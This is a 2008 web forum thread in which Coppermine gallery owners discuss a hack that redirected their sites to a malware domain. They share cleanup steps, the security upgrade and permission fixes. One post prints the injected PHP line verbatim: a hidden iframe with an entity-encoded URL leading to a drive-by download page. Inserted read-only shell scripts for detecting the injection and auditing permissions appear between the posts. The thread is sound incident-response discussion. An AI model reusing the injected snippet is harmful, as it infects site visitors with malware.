
Author Topic: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?  (Read 334125 times)


tfischer

« Reply #180 on: April 14, 2008, 09:30:50 pm »

Basically I want to do whatever I can to hide my galleries for the next few days/ weeks even if they need to go offline.

There have been no indications or rumors that there are additional immediate vulnerabilities beyond what was closed in the 1.4.18 security release.  Upgrade, sanitize, and cross your fingers...

-Tim

Hein Traag

« Reply #181 on: April 14, 2008, 09:46:47 pm »

No need to go paranoid people ;)

As Tim says. Update to 1.4.18 and you should be fine.

Kudos to Nibbler

ChaosCrusader

« Reply #182 on: April 14, 2008, 10:39:25 pm »

Can someone provide some clear instructions on how to sanitize your site?

From what I can gather this exploit went after the config and template files for Coppermine and Simplemachine forums.  I've checked my site and removed the upload and update files, removed the files uploaded by the exploit and removed and replaced the template and config files with backups.  Is there anything else I need to do?

capecodgal

« Reply #183 on: April 15, 2008, 12:45:53 am »

Quote
> There have been no indications or rumors that there are additional immediate vulnerabilities beyond what was closed in the 1.4.18 security release.  Upgrade, sanitize, and cross your fingers...
>
> -Tim

> No need to go paranoid people ;)
>
> As Tim says. Update to 1.4.18 and you should be fine.
>
> Kudos to Nibbler

Thanks guys for the advice... LOL I agree I went into a panic this morning when I saw it hit all of my sites; but believe I understand where they (moddys) are coming from in wanting to get it right to fix it; I work w/ a software company and I know we can't get our developers to fix anything if we can't tell them where it's broken- no need to look through 10,000+ lines of code it would take them ages; so yes I totally understand and appreciate what the developers of cpg are trying to do here and only get valid info...... problem is those of us that are not coders don't know the difference and I know they can't teach us what is and what isn't LOL - but I am thinking the update.php may be part of it after re-reading the multiple pages in this thread if that's how the attack originally gets the table names....

I can't get into my ftp or run the new upgrade until I am at home later tonight but here is what I am finding (sorry no logs or anything on this to support it just what I have seen and I apologize if it's useless info but if it helps anyone I consider it worth posting so advance apologies to the moddys if this is indeed useless info)

Here is the bit of code I found that I am removing now (it is in every single php file in cpg and outside from what I am seeing)

Code:
<?php echo '<iframe src="&#38;#104;&#38;#116;&#38;#116;&#38;#112;&#38;#58;&#38;#47;&#38;#47;&#38;#99;&#38;#100;&#38;#112;&#38;#117;&#38;#118;&#38;#98;&#38;#104;&#38;#102;&#38;#122;&#38;#122;&#38;#46;&#38;#99;&#38;#111;&#38;#109;&#38;#47;&#38;#100;&#38;#108;&#38;#47;&#38;#97;&#38;#100;&#38;#118;&#38;#53;&#38;#57;&#38;#56;&#38;#46;&#38;#112;&#38;#104;&#38;#112;" width=1 height=1></iframe>'?>

So those of you that don't know what to do:

#1 ask your host to restore your entire website it is the safest and best way to be sure all malicious code is gone OR if you do not have backups then unfortunately you are like me and will have to salvage what you can start looking at the php files in cpg and if it's the same type of attack look for a line of code like what I posted above; mine were located at the very end of the php file after all coppermine code- just be sure not to delete anything else you don't know what it is

#2 upgrade your galleries to the latest release (.18 is it I think)

#3 Be sure you do not give more access to your files than you need to; I have a bad habit of chmodding to 777 when I upload file batches and I forget to set it back when I am done to 644 or 755
*** I say this because chances are that's how this loser was able to get in my sites was because of my own stupidity with the permissions- interestingly enough ALL of our sites on Windows servers have not been affected by this hacker as chmod is a unix command and permissions are set manually in the OS with Windows instead of through FTP like on a unix/ apache server - for once in my life I am seeing Windows be the safer option which I find unbelievable but it explains a lot (IMHO) as I know how hosting via Windows works and all permissions are preset and not changeable via the ftp


foulu

« Reply #184 on: April 15, 2008, 07:27:27 am »

Hi,

I made a php file that can sanitize the additional data from php & html files that are infected with the iframe things. I created it to use on one of my working sites but I think releasing it will help more people. The script is simple: it just checks the current folder and all subfolders for .php & .html, loops to find the infected string in those files and then removes it. Anyway, use it at your own will; I will not take any responsibility if you damage your site when using it.

I attach the file with this post, download and rename it to cure.php, upload to your site & run it.

update: changed some functions to make the cure script run successfully in more cases.
update: added new url for download http://kak.amfcvn.net/files/cure.txt
« Last Edit: April 24, 2008, 09:43:06 am by foulu »
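
The recursive search described in the post above, and the manual check in capecodgal's step #1, as a read-only shell sketch. This is an added example, not foulu's cure.php or any script attached to this thread; the hidden-iframe heuristic, the function names and the sample tree with its `malicious.example` placeholder are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example: report (never modify) .php/.html files that carry a hidden iframe.
# Heuristic (assumption): an <iframe> whose width and height are both 0 or 1,
# quoted or unquoted, like the snippet posted earlier in the thread.
HIDDEN_DIM="=[\"']?[01][\"']?([^0-9%]|\$)"

# Print "relative_path:line/total_lines" for the first suspicious line per file,
# so it is easy to see whether the hit sits at the very end of the file.
scan_tree() {
    find "$1" -type f \( -name '*.php' -o -name '*.html' \) | sort |
    while IFS= read -r f; do
        hit=$(grep -n -i '<iframe' "$f" |
              grep -Ei "width$HIDDEN_DIM" |
              grep -Ei "height$HIDDEN_DIM" |
              head -n 1 | cut -d: -f1)
        if [ -n "$hit" ]; then
            printf '%s:%s/%s\n' "${f#"$1"/}" "$hit" "$(grep -c '' "$f")"
        fi
    done
}

# Constructed sample tree: one clean file, one legitimate visible iframe,
# and one file with a placeholder injection appended after the closing tag.
make_demo_tree() {
    d=$(mktemp -d) && mkdir -p "$d/themes/classic" "$d/include"
    printf '<?php\necho "gallery";\n?>\n' > "$d/index.php"
    printf '<html>\n<iframe src="map.html" width=640 height=480></iframe>\n</html>\n' \
        > "$d/themes/classic/about.html"
    printf '<?php\n$cfg = 1;\n?>\n%s' \
        "<?php echo '<iframe src=\"http://malicious.example/x.php\" width=1 height=1></iframe>'?>" \
        > "$d/include/config.inc.php"
    printf '%s\n' "$d"
}

demo=$(make_demo_tree)
scan_tree "$demo"
rm -rf "$demo"
```

Reporting the line position first makes it possible to review each hit by hand before deleting anything, which matters when a theme legitimately embeds an iframe.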

François Keller

« Reply #185 on: April 15, 2008, 07:51:52 am »

Thanks for sharing your script.
Did you read the DOC ? the FAQ ? and search the board before posting ?

ChaosCrusader

« Reply #186 on: April 15, 2008, 10:48:57 am »

> Here is the bit of code I found that I am removing now (it is in every single php file in cpg and outside from what I am seeing)


That's strange.  I only found it added to the template and config files.  Once I removed it from there it doesn't show up on any of my pages (as far as I can tell, by viewing the source).  Could it be that the exploit was used in different ways?

I'll go through my cpg files to double check.

NoviceScotty

« Reply #187 on: April 15, 2008, 10:50:36 am »

Hi guys -

being mildly annoyed by the fact that my web site was taken down and it would seem at least one computer rendered unusable by the stuff that was downloaded from the redirection (I'll post again if I ever get it repaired - it keeps running iexplore.exe svchost.exe and crashing)
I reported the cdpuvbhfzz to my local authorities (I'm in Switzerland).
Maybe you could all do the same in your countries. It probably doesn't do much good, but it might make you feel a little better.
The replies weren't very helpful, but rather than shouting at each other, better to light a candle than complain about the darkness, as I'm sure someone must have said.

>Many thanks for your query with the Reporting and Analysis Centre for Information Assurance (MELANI) of the Swiss Federal Police.
They went on to say it was my own fault for not keeping my web site updated, but at least they looked at it.

>We are happy to let you know that Cybercrime Coordination Unit Switzerland (CYCO) has received your message
> thank you for your cooperation. CYCO will verify your announcement, undertake the necessary steps and, where appropriate, contact you again.


Nibbler

« Reply #188 on: April 15, 2008, 11:14:40 am »

> That's strange.  I only found it added to the template and config files.  Once I removed it from there it doesn't show up on any of my pages (as far as I can tell, by viewing the source).  Could it be that the exploit was used in different ways?
>
> I'll go through my cpg files to double check.

The malicious code can only be added to files that have permissions set to be writable. The people with the biggest problems are those who had their entire site writable, so many more files were infected.

ChaosCrusader

« Reply #189 on: April 15, 2008, 11:26:31 am »

> The malicious code can only be added to files that have permissions set to be writable. The people with the biggest problems are those who had their entire site writable, so many more files were infected.

Ah, that explains it.  Would it be a good idea to change the permissions for the theme folder to exclude write permission?  Would it cause any problems with Coppermine?

Nibbler

« Reply #190 on: April 15, 2008, 01:34:58 pm »

The only things that need to be writable are those mentioned in the docs - albums directory + subdirectories and the include dir (during installation only). Everything else should be read only.
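
A read-only audit matching this advice, added here as an example and not taken from the Coppermine docs or any script in this thread: it lists world-writable files and directories outside `albums/` with the 755/644 modes mentioned earlier in the thread. It assumes installation is finished, so `include/` should no longer be writable; the function names and the demo site are constructed.

```shell
#!/bin/sh
# Added example: read-only audit of world-writable paths in a gallery root.
# Assumption: installation is finished, so only albums/ and its
# subdirectories may stay writable.

# Print "suggested_mode relative_path" for each world-writable file or
# directory outside albums/ (755 for directories, 644 for files).
audit_writable() {
    root=${1%/}
    find "$root" -path "$root/albums" -prune -o \
         \( -type f -o -type d \) -perm -0002 -print | sort |
    while IFS= read -r p; do
        if [ -d "$p" ]; then want=755; else want=644; fi
        rel=${p#"$root"}
        printf '%s %s\n' "$want" "${rel#/}"
    done
}

# Constructed demo site: include/ left writable after installation and one
# theme file left at 777 after an upload session.
make_demo_site() {
    s=$(mktemp -d) && mkdir -p "$s/albums/userpics" "$s/include" "$s/themes/classic"
    : > "$s/index.php"
    : > "$s/include/config.inc.php"
    : > "$s/themes/classic/template.html"
    chmod 755 "$s/themes" "$s/themes/classic"
    chmod 644 "$s/index.php" "$s/include/config.inc.php"
    chmod 777 "$s/albums" "$s/albums/userpics" "$s/include" \
              "$s/themes/classic/template.html"
    printf '%s\n' "$s"
}

site=$(make_demo_site)
audit_writable "$site"
rm -rf "$site"
```

Each output line can be reviewed and then applied with `chmod`; symlinks are skipped because their mode bits do not reflect the target's permissions.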

dgeo

« Reply #191 on: April 15, 2008, 02:09:46 pm »

A little shell (/bin/sh) script to clean up that... Not better than capecodgal's one but very simple to use if you have shell access or /bin/sh cgi capabilities.

Use it on your web's root.

Joachim Müller

« Reply #192 on: April 15, 2008, 04:58:28 pm »

As suggested I have tried to come up with an article that explains how to thoroughly sanitize your hacked coppermine-driven site. I have started a thread named "Yikes, I've been hacked! Now what?" and locked it on posting to avoid it from getting cluttered similarly to this one. HTH

Joachim

Nibbler

« Reply #193 on: April 15, 2008, 06:03:39 pm »

Awesome :)

François Keller

« Reply #194 on: April 15, 2008, 06:05:06 pm »

Woaw Joachim great work, Thanks for this awesome job. (I'll see to translate this for the French board)

capecodgal

« Reply #195 on: April 15, 2008, 06:28:04 pm »

> As suggested I have tried to come up with an article that explains how to thoroughly sanitize your hacked coppermine-driven site. I have started a thread named "Yikes, I've been hacked! Now what?" and locked it on posting to avoid it from getting cluttered similarly to this one. HTH
>
> Joachim


THANK YOU very much for all of your hard work - it is much appreciated Gau Gau  ;D

marian

« Reply #196 on: April 15, 2008, 06:54:10 pm »

> As suggested I have tried to come up with an article that explains how to thoroughly sanitize your hacked coppermine-driven site.
Great stuff.

AnnieBarlow

« Reply #197 on: April 15, 2008, 07:34:26 pm »

Is update.php admin only?

I'm 99% sure that I've upgraded one gallery to 1.4.16 without logging in

steveeh131047

« Reply #198 on: April 15, 2008, 07:38:01 pm »

Joachim: Thanks so much for this - you're a hero  :)

Nibbler: And thanks to you for the work on v1.4.18

Pascal YAP

« Reply #199 on: April 15, 2008, 10:08:27 pm »

WoWWoar !
Joachim Terrible ;D
Like Thu's cats, you have seven lives, 7 heads, 7 keyboards  ;D

@François
About our Fr Board, you'll start and i'll finish ?  ;)

PYAP